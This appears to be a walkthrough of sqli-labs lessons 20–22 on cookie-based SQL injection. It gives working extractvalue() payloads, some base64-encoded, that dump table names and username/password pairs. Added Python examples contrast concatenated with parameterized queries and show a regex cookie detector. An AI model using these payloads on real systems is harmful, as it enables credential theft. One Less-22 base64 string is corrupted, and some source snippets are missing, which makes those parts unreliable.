Cookies
Cookie injection is a little different from other Header injections
Cookie: when the browser sends a request to the server, it includes its cookies in this header; the cookies are set on the browser by the server. For example: Cookie: user=admin
Source code: if a cookie is set, the following statement will be executed:
will not execute:
Less-20
Log in to an account, then capture the request with the Hackbar LOAD command or Burp Suite.
Closing character: '$cookee'
Query the current database:
Dumb' or extractvalue(1,concat(0x7e,database())) #
The uname=Dumb part can be filled in with anything; it will not affect extractvalue().
Query the tables under the current database:
Dumb' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #
Query the fields of the current table:
Dumb' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #
Query data:
Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
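Why the closing character matters, as an added example (not code from the original page or from sqli-labs): the same lookup written with string concatenation and with a bound parameter. It assumes an in-memory SQLite table as a stand-in for the lab's MySQL users table, and the function names are hypothetical; the SQLite error only shows that the cookie value reached the SQL parser.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's users table (SQLite, not the lab's MySQL).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('Dumb', 'constructed-password')")
    return db

def lookup_concatenated(db, cookee):
    # Pattern behind the '$cookee' closing character: the cookie value is pasted
    # between the quotes, so a ' inside it ends the string and the rest is SQL.
    sql = "SELECT username FROM users WHERE username='" + cookee + "' LIMIT 1"
    return db.execute(sql).fetchone()

def lookup_bound(db, cookee):
    # Hardened form: the value is bound to a placeholder and is only ever data.
    sql = "SELECT username FROM users WHERE username=? LIMIT 1"
    return db.execute(sql, (cookee,)).fetchone()

def outcome(lookup, db, cookee):
    """'row', 'no row', or 'sql error' when the value altered the statement."""
    try:
        return "row" if lookup(db, cookee) else "no row"
    except sqlite3.Error:
        return "sql error"

def compare(cookee):
    db = make_db()
    return outcome(lookup_concatenated, db, cookee), outcome(lookup_bound, db, cookee)

if __name__ == "__main__":
    print(compare("Dumb"))
    print(compare("Dumb' or extractvalue(1,concat(0x7e,database())) #"))
```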
Less-21
base64_decode(): the cookie value is base64-decoded.
Log in to an account and use the Hackbar LOAD command. First URL-decode the = (taken from the web page), then base64-decode the value, which gives Dumb.
Closing character: ('$uname')
Query the current database:
Dumb') or extractvalue(1,concat(0x7e,database())) # base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpKSAj
Query the table of the database:
Dumb') or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) # base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IikpKSAj
Query the fields of the current table:
Dumb') or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) # base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0ic2VjdXJpdHkiIGFuZCB0YWJsZV9uYW1lPSJ1c2VycyIpKSkgIw==
Query data:
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...
base64: Q29va2llOiB1bmFtZT1EdW1iJykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj
base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLHN1YnN0cigoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwnQCcscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMpLDMxLDMxKSkpICM=
Less-22
The closing character has changed.
Log in to an account and capture the request with the Hackbar LOAD command or Burp Suite. The cookie value is RHVtYg== (with the = URL-encoded), namely Dumb.
The page jumps back to Less-21 here; the file name in the address bar has been changed to Less-22.
Closing character: "$cookee1"
Query the current database:
Dumb" or extractvalue(1,concat(0x7e,database())) # base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSkgIw==
Query the tables of the current database:
Dumb" or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) # base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIpKSkgIw==
Query the fields of the current table:
Dumb" or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) # base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIgYW5kIHRhYmxlX25hbWU9InVzZXJzIikpKSAj
Query data:
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...
base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0yMSkpSA
base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMzEsMzEpKSkgIw==
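A detection-side view of Less-21 and Less-22, as an added example that is not part of the original page or of sqli-labs: because the server base64-decodes the cookie, a filter that only pattern-matches the raw Cookie header sees nothing, so the check below also inspects the decoded value. The function names, the pattern list and the sample header values are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Patterns taken from the payloads on this page; a production rule set is broader.
SUSPICIOUS = re.compile(
    r"extractvalue\s*\(|information_schema|group_concat\s*\(|['\"]\s*\)?\s*or\b", re.I)

def views(value):
    """The cookie value URL-decoded, plus its base64 decoding when it has one."""
    plain = unquote(value)
    out = [plain]
    try:
        out.append(base64.b64decode(plain, validate=True).decode("utf-8"))
    except (binascii.Error, UnicodeDecodeError):
        pass  # not base64 text: only the plain form is inspected
    return out

def inspect_cookie(header_value, name="uname"):
    """Return 'plain', 'base64' or None: the layer where a pattern matched."""
    pairs = (p.strip().split("=", 1) for p in header_value.split(";") if "=" in p)
    value = dict(pairs).get(name)
    if value is None:
        return None
    for layer, text in zip(("plain", "base64"), views(value)):
        if SUSPICIOUS.search(text):
            return layer
    return None

# Constructed sample Cookie header values (not captured traffic).
_PAYLOAD = "Dumb') or extractvalue(1,concat(0x7e,database())) #"
SAMPLES = [
    "uname=" + quote(base64.b64encode(b"Dumb").decode()),            # normal login
    "uname=Dumb' or extractvalue(1,concat(0x7e,database())) #",      # Less-20 form
    "uname=" + quote(base64.b64encode(_PAYLOAD.encode()).decode()),  # Less-21 form
]

def run_samples():
    return [inspect_cookie(s) for s in SAMPLES]

if __name__ == "__main__":
    for sample, verdict in zip(SAMPLES, run_samples()):
        print(verdict, "<-", sample[:40])
```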